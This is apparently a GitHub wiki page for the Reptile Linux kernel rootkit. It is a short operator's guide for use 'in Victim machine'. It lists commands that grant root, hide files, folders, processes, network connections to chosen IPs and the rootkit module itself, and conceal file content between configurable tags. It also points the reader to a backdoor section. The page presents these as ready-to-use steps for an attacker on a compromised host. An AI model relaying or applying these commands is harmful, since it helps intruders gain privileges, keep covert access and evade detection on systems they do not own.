-
Notifications
You must be signed in to change notification settings - Fork 583
Local Usage
This Usage refers to a local usage to be done in Victim machine
To get root privileges just type: /reptile/reptile_cmd root
All files and folders that has reptile
in the name will be hidden. You can configure this before the installation. The following commands hide/unhide files, folders, processes and the kernel module itself.
To hide: /reptile/reptile_cmd hide
To unhide: /reptile/reptile_cmd show
To hide processes: /reptile/reptile_cmd hide <pid>
To unhide processes: /reptile/reptile_cmd show <pid>
Hide: /reptile/reptile_cmd conn <IP> hide
Unhide: /reptile/reptile_cmd conn <IP> show
Note: By default, TCP and UDP hiding feature are hiding all connections to an IP and disregarding PORT. If you really want to hide specific connections considering PORT, go to the code and see some comments in Connectoin hooks.
All content between tags will be hidden:
#<reptile>
content to hide
#</reptile>
You can configure these tags in installation script.
Click in Backdoor section!